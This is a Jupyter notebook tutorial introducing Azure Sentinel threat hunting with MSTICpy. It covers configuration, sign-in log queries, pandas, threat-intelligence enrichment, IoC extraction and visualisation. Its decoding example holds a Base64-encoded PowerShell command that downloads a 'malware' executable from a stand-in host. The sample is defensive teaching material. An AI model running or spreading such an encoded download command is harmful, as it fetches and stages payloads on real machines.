Notebook Version: 1.0
Python Version: Python 3.6 (including Python 3.6 - AzureML)
Required Packages:
Platforms Supported:
Data Sources Required:
This notebook takes you through the basics needed to get started with Azure Notebooks and Azure Sentinel, and shows how to perform the basic actions of data acquisition, data enrichment, data analysis, and data visualization. These actions are the building blocks of threat hunting with notebooks and are useful to understand before running more complex notebooks. This notebook covers each topic only lightly but includes 'learn more' sections that point you to resources for a deeper dive into each topic.
This notebook assumes that you are running it in an Azure Notebooks environment; however, it will also work in other Jupyter environments.
Note: This notebook uses SigninLogs from your Azure Sentinel Workspace. If you are not yet collecting SigninLogs, configure this connector in the Azure Sentinel portal before running this notebook. This notebook also uses the VirusTotal API for data enrichment; for this you will require an API key, which can be obtained by signing up for a free VirusTotal community account.
You are currently reading a Jupyter notebook. Jupyter is an interactive development and data manipulation environment presented in a browser. Using Jupyter you can create documents, called Notebooks. These documents are made up of cells that contain interactive code, alongside that code's output, and other items such as text and images (what you are looking at now is a cell of Markdown text).
The name Jupyter comes from the core programming languages that it supports: Julia, Python, and R. Whilst you can use any of these languages, we are going to use Python in this notebook; in addition, the notebooks that come with Azure Sentinel are all written in Python. Whilst there are pros and cons to each language, Python is a well-established language with a large number of materials and libraries well suited to data analysis and security investigation, making it ideal for our needs.
To use a Jupyter notebook you need a Jupyter server that will render the notebook and execute the code within it. This can take the form of a local Jupyter installation, or a remotely hosted version such as Azure Notebooks. If you are reading this it is highly likely that you already have a Jupyter server that this notebook is using. You can learn more about installing and running your own Jupyter server here.
If you accessed this notebook from Azure Sentinel, you are probably using Azure Notebooks to run this notebook. Azure Notebooks runs in the same way as a local Jupyter server, with the additional features of integrated project management and file storage. When you open a notebook in Azure Notebooks the user interface is nearly identical to a standard Jupyter notebook experience.
Before you can start running code in a notebook you need to make sure that it is connected to a Jupyter server and that you have the correct type of kernel configured. For this notebook we are going to be using Python 3.6. Azure Notebooks has hopefully already loaded this kernel for you; you can check this by looking at the top left corner of the screen, where you should see the currently connected kernel.
If this does not read Python 3.6 you can select the correct kernel by selecting Kernel > Change kernel from the top menu and clicking Python 3.6.
Note: the notebook works with Python 3.6 or later. If you are using this notebook in Azure ML or another Jupyter environment you can choose any kernel that supports Python 3.6 or later.
Once you have done this you should be ready to move onto a code cell.
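If you would rather confirm the kernel version from code than from the menu, a minimal sketch along the following lines can be run in any code cell. The helper name meets_min_version is hypothetical and is not part of the notebook or of MSTICpy; it only compares version tuples from the standard library.

```python
import sys


def meets_min_version(min_version, current=None):
    """Return True if `current` (default: the running interpreter) is at least `min_version`."""
    if current is None:
        current = sys.version_info[:3]
    # Tuples compare element by element, so (3, 6, 9) >= (3, 6) is True
    return tuple(current) >= tuple(min_version)


print("Running Python", ".".join(str(part) for part in sys.version_info[:3]))
print("Meets the 3.6 minimum:", meets_min_version((3, 6)))
```

If the second line prints False, change the kernel as described above before continuing.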
Tip: You can identify which cells are code by selecting them and looking at the drop-down box at the center of the top menu. It will read 'Code' (for interactive code cells), 'Markdown' (for Markdown text cells like this one), or 'Raw NBConvert' (these cells hold raw data that is not interpreted by Jupyter; they can be used by tools that process notebook files, such as nbconvert, to render the data into HTML or LaTeX).
If you click on the cell below you should see this box change to 'Code'.
More details on Azure Notebooks can be found in the Azure Notebooks documentation and the Azure Sentinel documentation.
Once you have selected a code cell you can run it by clicking the Run button in the menu bar at the top, or by pressing Shift+Enter (Ctrl+Enter also runs the cell, but keeps it selected rather than moving to the next cell).
# This is our first code cell, it contains basic Python code.
# You can run a code cell by selecting it and clicking the Run button in the top menu, or by pressing Shift + Enter.
# Once you run a code cell any output from that code will be displayed directly below it.
print("Congratulations you just ran this code cell")
y = 2+2
print("2 + 2 =", y)
Variables set within a code cell persist between cells, meaning you can chain cells together:
y + 2
Now that you understand the basics we can move onto more complex code.
Code cells behave in the same way your code would in other environments, so you need to remember common coding practices such as variable initialization and library imports. Before we execute more complex code we need to make sure the required packages are installed and libraries imported. At the top of many of the Azure Sentinel notebooks you will see large cells that check kernel versions and then install and import all the libraries used in the notebook; make sure you run these before running other cells. If you are running notebooks locally or via dedicated compute in Azure Notebooks, library installs will persist, but this is not the case with the Azure Notebooks free tier, so you will need to install them each time you run. Even in a static environment, imports are required for each run, so make sure you run this cell regardless.
from pathlib import Path
import importlib
import os
import sys
import warnings
from IPython.display import display, HTML, Markdown
REQ_PYTHON_VER = (3, 6)
REQ_MSTICPY_VER = (0, 6, 0)
display(HTML("<h3>Starting Notebook setup...</h3>"))
# If you did not clone the entire Azure-Sentinel-Notebooks repo you may not have this file
if Path("./utils/nb_check.py").is_file():
    from utils.nb_check import check_python_ver, check_mp_ver
    check_python_ver(min_py_ver=REQ_PYTHON_VER)
    try:
        check_mp_ver(min_msticpy_ver=REQ_MSTICPY_VER)
    except ImportError:
        # msticpy is missing or too old: install or upgrade it, then (re)load it
        !pip install --upgrade msticpy
        if "msticpy" in sys.modules:
            importlib.reload(sys.modules["msticpy"])
        else:
            import msticpy
        check_mp_ver(REQ_MSTICPY_VER)
from msticpy.nbtools import nbinit
nbinit.init_notebook(
    namespace=globals(),
    extra_imports=["ipwhois, IPWhois", "urllib.request, urlretrieve", "yaml"]
)
Once we have set up our Jupyter environment with the libraries that we'll use in the notebook, we need to make sure we have some configuration in place. Some of the notebook components need additional configuration to connect to external services (e.g. API keys to retrieve Threat Intelligence data). This includes configuration for the connection to our Azure Sentinel workspace, as well as for some threat intelligence providers we will use later.
The easiest way to handle the configuration for these services is to store them in a msticpyconfig file (msticpyconfig.yaml). More details on msticpyconfig can be found here: https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html
The Azure-Sentinel-Notebooks GitHub repo contains a template msticpyconfig file ready to be populated. If you have run this notebook before you may already have a populated msticpyconfig file; the cell below checks whether this file exists and displays its contents. If your config file does not contain details under Azure Sentinel > Workspaces, or TIProviders, the following cells will populate these for you.
If you want to see an example of what a populated msticpyconfig file should look like, a sample is included in the repo as msticpyconfig-sample.yaml.
import yaml
def print_config():
    with open('msticpyconfig.yaml') as f:
        data = yaml.load(f, Loader=yaml.FullLoader)
        print(yaml.dump(data))
try:
    print_config()
except FileNotFoundError:
    print("No msticpyconfig.yaml was found in your current directory.")
    print("We are downloading a template file for you.")
    urlretrieve("https://raw.githubusercontent.com/Azure/Azure-Sentinel-Notebooks/master/msticpyconfig.yaml", "msticpyconfig.yaml")
    print_config()
If you do not have a msticpyconfig file we can populate one for you. Before you do this you will need a few things.
The first is the Workspace ID and Tenant ID of the Azure Sentinel Workspace you wish to connect to.
You can get the workspace ID by opening Azure Sentinel in the Azure Portal and selecting Settings > Workspace Settings. Your Workspace ID is displayed near the top of this page.
You can get your tenant ID (also referred to as the organization or directory ID) via Azure Active Directory.
We are going to use VirusTotal to enrich our Azure Sentinel data. For this you will need a VirusTotal API key, which can be obtained for free (as a personal key) via the VirusTotal website.
We are using VirusTotal for this notebook but we also support a range of other threat intelligence providers: https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html
In addition, we are going to plot IP address locations on a map. To do this we are going to use MaxMind to geolocate IP addresses, which requires an API key. You can sign up for a free account and API key at https://www.maxmind.com/en/geolite2/signup.
Once you have these required items, run the cell below and you will be prompted to enter them:
ws_id = nbwidgets.GetEnvironmentKey(env_var='WORKSPACE_ID',
    prompt='Please enter your Log Analytics Workspace Id:', auto_display=True)
ten_id = nbwidgets.GetEnvironmentKey(env_var='TENANT_ID',
    prompt='Please enter your Log Analytics Tenant Id:', auto_display=True)
vt_key = nbwidgets.GetEnvironmentKey(env_var='VT_KEY',
    prompt='Please enter your VirusTotal API Key:', auto_display=True)
mm_key = nbwidgets.GetEnvironmentKey(env_var='MM_KEY',
    prompt='Please enter your MaxMind API Key:', auto_display=True)
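Workspace IDs and tenant IDs are both GUIDs, so a pasted value can be sanity-checked before it is written to the config file. The sketch below uses only the standard library; the helper name looks_like_guid and the sample value are made up for illustration and are not part of MSTICpy.

```python
import uuid


def looks_like_guid(value):
    """Return True if `value` is a GUID in the usual hyphenated form (case-insensitive)."""
    try:
        candidate = value.strip()
        # uuid.UUID also accepts other spellings (no hyphens, braces), so compare
        # against the canonical form to accept only the hyphenated layout
        return str(uuid.UUID(candidate)) == candidate.lower()
    except (ValueError, AttributeError, TypeError):
        return False


# Placeholder value for illustration only, not a real workspace ID
print(looks_like_guid("12345678-1234-1234-1234-1234567890ab"))
print(looks_like_guid("not-a-guid"))
```

In the notebook the same check could be applied to ws_id.value and ten_id.value after the widgets above have been filled in.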
The cell below will now populate a msticpyconfig file with these values:
with open("msticpyconfig.yaml") as config:
    # safe_load is sufficient for a plain settings file
    data = yaml.safe_load(config)
# Make sure the AzureSentinel section exists before adding the workspace to it
if not data.get("AzureSentinel"):
    data["AzureSentinel"] = {}
workspace = {"Default":{"WorkspaceId": ws_id.value, "TenantId": ten_id.value}}
ti = {"VirusTotal":{"Args": {"AuthKey" : vt_key.value}, "Primary" : True, "Provider": "VirusTotal"}}
other_prov = {"GeoIPLite" : {"Args" : {"AuthKey" : mm_key.value, "DBFolder" : "~/msticpy"}, "Provider" : "GeoLiteLookup"}}
data['AzureSentinel']['Workspaces'] = workspace
data['TIProviders'] = ti
data['OtherProviders'] = other_prov
with open("msticpyconfig.yaml", 'w') as config:
    yaml.dump(data, config)
print("msticpyconfig.yaml updated")
We can now validate our configuration is correct.
from msticpy.common.pkg_config import refresh_config, validate_config
refresh_config()
validate_config()
Note: you may see warnings for missing providers when running this cell. This is not an issue, as we will not be using all providers in this notebook. So long as you get the message "No errors found." you are OK to proceed.
Now that we have configured the details necessary to connect to Azure Sentinel we can go ahead and get some data. We will do this with QueryProvider() from MSTICpy.
You can use the QueryProvider class to connect to different data sources such as MDATP, the Security Graph API, and the one we will use here, Azure Sentinel.
For now, we are going to set up a QueryProvider for Azure Sentinel, pass it the details for our workspace that we just stored in the msticpyconfig file, and connect. The connection process will ask us to authenticate to our Azure Sentinel workspace via device authorization with our Azure credentials. You can do this by clicking the device login code button that appears as the output of the next cell, or by navigating to https://microsoft.com/devicelogin and manually entering the code. Note that this authentication persists with the kernel you are using with the notebook, so if you restart the kernel you will need to re-authenticate.
# Initialize a QueryProvider for Azure Sentinel
qry_prov = QueryProvider("LogAnalytics")
# Get the Azure Sentinel workspace details from msticpyconfig
try:
    ws_config = WorkspaceConfig()
    md("Workspace details collected from config file")
except Exception as err:
    raise Exception("No workspace settings are configured, please run the cells above to configure these.") from err
# Connect to Azure Sentinel with our QueryProvider and config details
# ws_config.code_connect_str is a feature of MSTICpy that creates the required connection string from details in our msticpyconfig
qry_prov.connect(connection_str=ws_config.code_connect_str)
Now that we have connected we can query Azure Sentinel for data, but before we do that we need to understand what data is available to query. The QueryProvider object provides a way to get a list of tables, as well as the columns of each table:
# Get list of tables in our Workspace
display(qry_prov.schema_tables[:5]) # We are outputting only the first 5 tables for brevity
# Get list of tables and their columns
qry_prov.schema['SigninLogs'] # We are only displaying the columns for SigninLogs for brevity
MSTICpy includes a number of built in queries that you can run.
You can list available queries with .list_queries() and get specific details about a query by calling it with "?" as a parameter.
# Get a list of available queries
qry_prov.list_queries()
# Get details about a query
qry_prov.Azure.list_all_signins_geo("?")
You can then run the query by calling it with the required parameters:
from datetime import datetime, timedelta
# set our query end time as now
end = datetime.now()
# set our query start time as 1 hour ago
start = end - timedelta(hours=1)
# run query with specified start and end times
logons_df = qry_prov.Azure.list_all_signins_geo(start=start, end=end)
# display first 5 rows of any results
logons_df.head() # If you have no data you will just see the column headings displayed
Another way to run queries is to pass a KQL query as a string to the query provider. This runs the query against the workspace we connected to above and returns the data in a Pandas DataFrame. We will look at working with Pandas in a bit more detail later.
# Define our query
test_query = """
SigninLogs
| where TimeGenerated > ago(7d)
| take 10
"""
# Pass that query to our QueryProvider
test_df = qry_prov.exec_query(test_query)
# Check that we have some data
if isinstance(test_df, pd.DataFrame) and not test_df.empty:
    # .head() returns the first 5 rows of our results DataFrame
    display(test_df.head())
# If there is no data load some sample data to use instead
else:
    md("You don't appear to have any SigninLogs - we will load sample data for you to use.")
    if not Path("nbdemo/data/aad_logons.pkl").exists():
        Path("nbdemo/data/").mkdir(parents=True, exist_ok=True)
        urlretrieve('https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/nbdemo/data/aad_logons.pkl?raw=true', 'nbdemo/data/aad_logons.pkl')
        urlretrieve('https://raw.githubusercontent.com/Azure/Azure-Sentinel-Notebooks/master/nbdemo/data/queries.yaml', 'nbdemo/data/queries.yaml')
    qry_prov = QueryProvider("LocalData", data_paths=["nbdemo/data/"], query_paths=["nbdemo/data/"])
    logons_df = qry_prov.Azure.list_all_signins_geo()
    display(logons_df.head())
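Because the query is just a string, it can be assembled from parameters before it is passed to the query provider. The following is a minimal sketch; the helper build_signin_query is hypothetical and simply reproduces the shape of the query used above with a configurable look-back period and row limit.

```python
def build_signin_query(days=7, limit=10):
    """Build a KQL query string that returns a few recent SigninLogs rows."""
    if days < 1 or limit < 1:
        raise ValueError("days and limit must be positive integers")
    return (
        "SigninLogs\n"
        f"| where TimeGenerated > ago({int(days)}d)\n"
        f"| take {int(limit)}"
    )


print(build_signin_query(days=1, limit=5))
```

The returned string could then be passed to qry_prov.exec_query() in the same way as test_query.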
Our query results are returned in the form of a Pandas DataFrame. DataFrames are a core component of the Azure Sentinel notebooks and of MSTICpy, and are used for both input and output formats. Pandas DataFrames are incredibly versatile data structures with a lot of useful features. We will cover a small number of them here, and we recommend that you check out the Learn more section to learn more about Pandas features.
# For this section we are going to create a DataFrame from data we have saved in a csv file
df = pd.read_csv("https://raw.githubusercontent.com/microsoft/msticpy/master/tests/testdata/host_logons.csv", index_col=[0] )
# Display our DataFrame
df # or display(df)
Note: if the DataFrame variable (df in the example above) is the last statement in a code cell, Jupyter will automatically display it without using the display() function. However, if you want to display a DataFrame in the middle of other code in a cell you must use the display() function.
You may not want to display the whole DataFrame and instead display only a selection of items. There are numerous ways to do this and the cell below shows some of the most widely used functions.
md("Display the first 2 rows using head(): ", "bold")
display(df.head(2)) # we don't need to call display here but just for illustration
md("Display the 4th row (index 3) using iloc[]: ", "bold")
df.iloc[3]
md("Show the column names in the DataFrame ", "bold")
df.columns
md("Display just the TimeGenerated and TenantId columns: ", "bold")
df[["TimeGenerated", "TenantId"]]
We can also choose to select a subsection of our DataFrame based on the contents of the DataFrame:
Tip: the syntax in these examples uses a technique called boolean indexing. df[<boolean expression>] returns all rows in the DataFrame where the boolean expression is True.
In the first example we are telling pandas to return all rows where the column value of 'TargetUserName' matches 'MSTICAdmin'.
md("Display only rows where TargetUserName value is 'MSTICAdmin': ", "bold")
df[df['TargetUserName']=="MSTICAdmin"]
md("Display rows where TargetUserName is either MSTICAdmin or adm1nistrator:", "bold")
display(df[df['TargetUserName'].isin(['adm1nistrator', 'MSTICAdmin'])])
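Boolean expressions can also be combined. The sketch below builds a small made-up DataFrame (the rows and the LogonType values are illustrative, not taken from the sample data) and shows the & (and), | (or) and ~ (not) operators. Each condition is stored in its own variable; if you write the conditions inline, wrap each one in parentheses.

```python
import pandas as pd

# Made-up rows that mimic the shape of the logon data used above
sample_df = pd.DataFrame(
    {
        "TargetUserName": ["MSTICAdmin", "adm1nistrator", "MSTICAdmin", "ian"],
        "LogonType": [3, 10, 10, 3],
    }
)

is_admin = sample_df["TargetUserName"] == "MSTICAdmin"
is_remote = sample_df["LogonType"] == 10

both = sample_df[is_admin & is_remote]    # rows matching both conditions
either = sample_df[is_admin | is_remote]  # rows matching at least one condition
not_admin = sample_df[~is_admin]          # rows where the first condition is False

print(both)
print(either)
print(not_admin)
```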
Our DataFrame can also be extended to add new columns with additional data if required:
df["NewCol"] = "Look at my new data!"
display(df[["TenantId","Account", "TimeGenerated", "NewCol"]].head(2))
There is a lot more you can do with Pandas, the links below provide some useful resources:
Now that we have seen how to query for data, and do some basic manipulation we can look at enriching this data with additional data sources. For this we are going to use an external threat intelligence provider to give us some more details about an IP address we have in our dataset using the MSTICpy TIProvider feature.
from datetime import datetime, timedelta
# Check if we have logon data already and if not get some
if not isinstance(logons_df, pd.DataFrame) or logons_df.empty:
    # set our query end time as now
    end = datetime.now()
    # set our query start time as 1 day ago
    start = end - timedelta(days=1)
    # run query with specified start and end times
    logons_df = qry_prov.Azure.list_all_signins_geo(start=start, end=end)
# Create our TI provider
ti = TILookup()
# Get the first logon IP address from our dataset
ip = logons_df.iloc[0]['IPAddress']
# Look up the IP in VirusTotal
ti_resp = ti.lookup_ioc(ip, providers=["VirusTotal"])
# Format our results as a DataFrame
ti_resp = ti.result_to_df(ti_resp)
display(ti_resp)
Using the Pandas apply() feature we can get results for all the IP addresses in our data set and add the lookup severity score as a new column in our DataFrame for easier reference.
# Take the IP address in each row, look it up against TI and return the severity score
def lookup_res(row):
    ip = row['IPAddress']
    resp = ti.lookup_ioc(ip, providers=["VirusTotal"])
    resp = ti.result_to_df(resp)
    return resp["Severity"].iloc[0]
# Take the first 3 rows of data and copy them into a new DataFrame
enrich_logons_df = logons_df.iloc[:3].copy()
# Create a new column called TIRisk and populate that with the TI severity score of the IP Address in that row
enrich_logons_df['TIRisk'] = enrich_logons_df.apply(lookup_res, axis=1)
# Display a subset of columns from our DataFrame
enrich_logons_df[["TimeGenerated", "ResultType", "UserPrincipalName", "IPAddress", "TIRisk"]]
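Looking up every row individually repeats the same API call whenever an IP address appears more than once, which matters when the provider limits request rates. One possible approach, sketched below with a stand-in lookup function rather than a real TI provider, is to look up each distinct address once and reuse the result. The names lookup_unique and fake_lookup, the sample addresses and the severity strings are all hypothetical.

```python
def lookup_unique(values, lookup_func):
    """Call lookup_func once per distinct value and return a value -> result dict."""
    results = {}
    for value in values:
        if value not in results:
            results[value] = lookup_func(value)
    return results


# Stand-in for a real TI lookup so the sketch runs without an API key
calls = []


def fake_lookup(ip):
    calls.append(ip)
    return "high" if ip == "203.0.113.7" else "information"


ips = ["203.0.113.7", "198.51.100.2", "203.0.113.7", "198.51.100.2"]
severity_by_ip = lookup_unique(ips, fake_lookup)

# Map the cached results back onto the original, repeated list
severities = [severity_by_ip[ip] for ip in ips]
print(severities)
print("Lookups performed:", len(calls))
```

With a DataFrame, the resulting dictionary could be applied to the IPAddress column using the pandas Series.map() method.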
MSTICpy includes further threat intelligence capabilities as well as other data enrichment options. More details on these can be found in the documentation.
With the data we have collected we may wish to perform some analysis in order to better understand it. MSTICpy includes a number of features to help with this, and there is a vast array of other data analysis capabilities available via Python, ranging from simple processes to complex ML models. We will keep it simple here and look at how we can decode some Base64 encoded command line strings in order to understand their content.
from msticpy.sectools import base64unpack as b64
# Take our encoded Powershell Command
b64_cmd = "powershell.exe -encodedCommand SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jb250b3NvLmNvbS9tYWx3YXJlIC1PdXRGaWxlIEM6XG1hbHdhcmUuZXhl"
# Unpack the Base64 encoded elements
unpack_txt = b64.unpack(input_string=b64_cmd)
# Display our results and transform for easier reading
unpack_txt[1].T
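To illustrate the general idea behind this kind of decoding, the sketch below finds Base64-looking substrings with a regular expression and decodes them with the standard library. It is a simplified illustration under stated assumptions (UTF-8 content, a minimum run of 20 characters), not a description of how MSTICpy implements base64unpack; the function name decode_base64_fragments is hypothetical.

```python
import base64
import re

# Runs of 20 or more Base64 characters, optionally followed by padding
B64_PATTERN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_base64_fragments(text):
    """Return (encoded, decoded) pairs for substrings that decode cleanly as UTF-8 text."""
    results = []
    for candidate in B64_PATTERN.findall(text):
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8")
        except ValueError:
            # Not valid Base64, or not UTF-8 text once decoded: skip it
            continue
        results.append((candidate, decoded))
    return results


b64_cmd = "powershell.exe -encodedCommand SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jb250b3NvLmNvbS9tYWx3YXJlIC1PdXRGaWxlIEM6XG1hbHdhcmUuZXhl"
for encoded, decoded in decode_base64_fragments(b64_cmd):
    print(decoded)
```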
We can also use MSTICpy to extract Indicators of Compromise (IoCs) from a dataset, which makes it easy to extract and match on a set of IoCs within our data. In the example below we take a US Cybersecurity & Infrastructure Security Agency (CISA) report and extract all domains listed in the report:
import requests
# Set up our IoCExtract object
ioc_extractor = iocextract.IoCExtract()
# Download our threat report
data = requests.get("https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml")
# Extract domains listed in our report
iocs = ioc_extractor.extract(data.text, ioc_types="dns")['dns']
# Display the first 5 iocs found in our report
list(iocs)[:5]
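Conceptually, this kind of extraction is pattern matching over text. The sketch below pulls domain-like strings out of a made-up sentence using a deliberately simplified regular expression. It is not the pattern that MSTICpy uses, and unlike a production extractor it does not check that the top-level domain is a real one.

```python
import re

# Simplified pattern: dot-separated labels ending in an alphabetic TLD of 2+ letters
DOMAIN_PATTERN = re.compile(
    r"\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}\b",
    re.IGNORECASE,
)


def extract_domains(text):
    """Return the set of distinct domain-like strings found in text, lower-cased."""
    return {match.lower() for match in DOMAIN_PATTERN.findall(text)}


# Made-up report text for illustration
report = (
    "Beacons to evil.example.com and updates.example.net; "
    "contact soc@contoso.com. Seen from 10.0.0.1."
)
domains = extract_domains(report)
print(sorted(domains))
```

Note that the IP address in the sample text is not returned, because its final label is numeric rather than alphabetic.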
There are a wide range of options when it comes to data analysis in notebooks using Python. Here are some useful resources to get you started:
Visualizing data is an excellent way to analyse data and identify patterns and anomalies. Python has a wide range of data visualization capabilities, each of which has its own benefits and drawbacks. We will look at some basic capabilities as well as the built-in visualizations in MSTICpy.
Basic Graphs
Pandas and Matplotlib provide the easiest and simplest way to produce simple plots of data:
vis_q = """
SigninLogs
| where TimeGenerated > ago(7d)
| sample 5"""
# Try and query for data but if using sample data load that instead
try:
    vis_data = qry_prov.exec_query(vis_q)
except FileNotFoundError:
    vis_data = logons_df
# Check we have some data in our results and if not use previously used dataset
if not isinstance(vis_data, pd.DataFrame) or vis_data.empty:
    vis_data = logons_df
# Plot up to the first 5 IP addresses
vis_data.head()['IPAddress'].value_counts().plot.bar(title="IP prevalence", legend=False)
pie_df = vis_data.copy()
# If we have lots of data just plot the first 5 rows
pie_df.head()['IPAddress'].value_counts().plot.pie(legend=True)
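Both plots are built on value_counts(), which counts how often each distinct value appears. As a rough picture of that step without any plotting library, the sketch below does the same tally with collections.Counter on a made-up list of addresses and prints a simple text bar for each.

```python
from collections import Counter

# Made-up IP addresses for illustration
ips = ["203.0.113.7", "198.51.100.2", "203.0.113.7", "192.0.2.10", "203.0.113.7"]

# Tally occurrences of each distinct address
ip_counts = Counter(ips)

# Print the addresses from most to least frequent with a text bar
for ip, count in ip_counts.most_common():
    print(f"{ip:<15} {'#' * count} ({count})")
```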
Bokeh is a powerful visualization library that allows you to create complex, interactive visualizations. MSTICpy includes a number of pre-built visualizations using Bokeh including a timeline feature that can be used to represent events over time. You can interact with the timeline by zooming and panning, using the range selector, as well as hovering over data points to see more details.
from datetime import datetime, timedelta
# Check if we have logon data already and if not get some
if not isinstance(logons_df, pd.DataFrame) or logons_df.empty:
    # set our query end time as now
    end = datetime.now()
    # set our query start time as 1 day ago
    start = end - timedelta(days=1)
    # run query with specified start and end times
    logons_df = qry_prov.Azure.list_all_signins_geo(start=start, end=end)
display(timeline.display_timeline(logons_df.head(10), source_columns=["TimeGenerated", "ResultType", "UserPrincipalName", "IPAddress"], group_by="AppDisplayName"))
MSTICpy also includes a feature that allows you to map locations. This can be particularly useful when looking at the distribution of remote network connections or other events. Below we plot the locations of remote logons observed in our Azure AD data.
from msticpy.sectools.ip_utils import convert_to_ip_entities
from msticpy.nbtools.foliummap import FoliumMap, get_map_center
# Convert our IP addresses in string format into an ip address entity
ip_entity = entityschema.IpAddress()
ip_list = [convert_to_ip_entities(i)[0] for i in logons_df['IPAddress'].head(10)]
# Get center location of all IP locations to center the map on
location = get_map_center(ip_list)
logon_map = FoliumMap(location=location, zoom_start=4)
# Add location markers to our map and display it
if len(ip_list) > 0:
    logon_map.add_ip_cluster(ip_entities=ip_list)
    display(logon_map.folium_map)
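Centering a map comes down to choosing a single latitude and longitude that represents a set of points. One simple way to do that, shown below, is to average the coordinates. This is only an illustration of the idea and is not necessarily how get_map_center calculates its result; the function name simple_map_center and the coordinates are made up.

```python
from statistics import mean


def simple_map_center(coordinates):
    """Return the (latitude, longitude) average of a list of coordinate pairs."""
    if not coordinates:
        raise ValueError("at least one coordinate pair is required")
    latitudes = [lat for lat, _ in coordinates]
    longitudes = [lon for _, lon in coordinates]
    return (mean(latitudes), mean(longitudes))


# Made-up (latitude, longitude) pairs for illustration
points = [(47.0, -122.0), (51.0, 0.0), (40.0, -74.0)]
center = simple_map_center(points)
print(center)
```

A plain average works for points that are reasonably close together, but it can give misleading results for points that straddle the 180 degree meridian.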
This notebook has shown you the basics of using notebooks and Azure Sentinel for security investigations. Much more is possible with notebooks, and you are strongly encouraged to read the material referenced in the learn more sections of this notebook. You can also explore the other Azure Sentinel notebooks in order to take advantage of the pre-built hunting logic and understand other analysis techniques that are possible.